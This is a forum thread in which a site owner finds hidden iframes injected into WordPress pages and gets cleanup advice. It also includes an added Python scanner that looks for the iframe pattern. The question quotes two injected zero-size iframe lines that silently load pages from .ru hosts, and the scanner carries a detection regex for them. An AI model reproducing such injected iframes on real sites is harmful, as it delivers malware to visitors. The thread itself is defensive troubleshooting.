This is the second time in a few days that randomly, during the night, without me doing any work on my site, I get the following error message coming up on www.midweekpolitics.com:

Parse error: syntax error, unexpected T_STRING in /home/midweekp/public_html/index.php on line 18

Upon investigation, that line refers to some weird iframe stuff referring to .ru sites that is in the code:

<iframe frameborder="0" onload="if (!this.src){ this.src='http://intelq.ru:8080/index.php'; this.height='0'; this.width='0';}" >guujlquemswxeftblmwvmis
<iframe frameborder="0" onload="if (!this.src){ this.src='http://iquotient.ru:8080/index.php'; this.height='0'; this.width='0';}" >wfnawqfzjddeigipfjwtmqkliixxndi</iframe>

Several pages have this in them, including when I go to www.midweekpolitics.com/wp-admin.

I've changed passwords, and it's a brand new VPS, so it's not like it's been around so long with the same password that there are likely security issues.

How would I fix and prevent this? Going through and simply removing the iframe lines didn't fix it, so I put the code back exactly how it was and posted here.
Sort the files in your root directory by date and see if there are any newish files that don't belong - or if there are any files that DO belong, but have unusually recent modified date stamps.

If you've got a backup of your WP database, it would probably be quicker to just delete everything, change your FTP password, create a NEW db (with a new login/pass) and reimport everything. If you've got backups, it's probably 10 minutes' work at the most.

Did you change your FTP, MySQL, and WordPress passwords?
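The check suggested in the reply above (recently modified files), combined with a search for the iframe pattern quoted in the question, as an added example that is not part of the original thread. The function names, the extension list and the three-day window are assumptions, and the sample files are constructed.

```python
import os
import re
import tempfile
import time

# Pattern from the thread: an <iframe> whose onload handler assigns this.src.
INJECTED_IFRAME = re.compile(rb"<iframe\b[^>]*\bonload\s*=[^>]*this\.src\s*=", re.I)
WEB_EXTENSIONS = (".php", ".html", ".htm", ".js")


def scan(root, recent_days=3, now=None):
    """Return (injected, recent): [(path, [line numbers])] and recently modified paths."""
    cutoff = (time.time() if now is None else now) - recent_days * 86400
    injected, recent = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            try:
                mtime = os.path.getmtime(path)
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip instead of aborting the scan
            if mtime >= cutoff:
                recent.append((mtime, path))
            hits = [data.count(b"\n", 0, m.start()) + 1 for m in INJECTED_IFRAME.finditer(data)]
            if hits:
                injected.append((path, hits))
    return injected, [p for _m, p in sorted(recent, reverse=True)]


def demo():
    """Scan a constructed document root (sample files, not from the thread's site)."""
    root = tempfile.mkdtemp()
    clean, bad = os.path.join(root, "about.php"), os.path.join(root, "index.php")
    with open(clean, "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    with open(bad, "w") as fh:
        fh.write("<?php get_header(); ?>\n<iframe frameborder=\"0\" onload=\"if "
                 "(!this.src){ this.src='http://example.invalid/'; this.height='0';}\" >x\n")
    old = time.time() - 30 * 86400
    os.utime(clean, (old, old))  # make about.php look a month old
    return scan(root), clean, bad


if __name__ == "__main__":
    print(demo()[0])
```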
I didn't change all the passwords, that's a good point. If I back up the db now, will it still be an effective backup to restore from, or would it be "tainted" in some way?

Also: where in WordPress (which file) do I change the MySQL password?
I'd be more likely to trust a (posts only) export from WP admin than a full export of your entire MySQL db. A WP backup might take a bit of noodling to restore (I don't think it saves your comments btw!), but I think it's probably the safer option.

wp-config.php

Good luck!
Changing passwords is not enough. You need to remove all saved account details & passwords in your FTP client.

How To Completely Remove All Malicious Iframes on Your Website Forever
Interesting, I do indeed have FileZilla with stored access info. I just went in, cleared it, and uninstalled FileZilla altogether. What is a safe FTP program to use? A quick Google search revealed many FTP programs that do this exact thing.
VIRUS SCAN just found this, which sounds like EXACTLY what would cause this. What should I do? Will AVG remove these properly?

"Detection name";"Virus found HTML/Framer"
"Object type";"file"
"SDK Type";"Core"
"Result";"Infected"
"Action history";""
I don't know which software is safe, because the virus attacks not only FileZilla. Looks like AVG can't remove it. Anyway, just don't save passwords and I think it will be fine.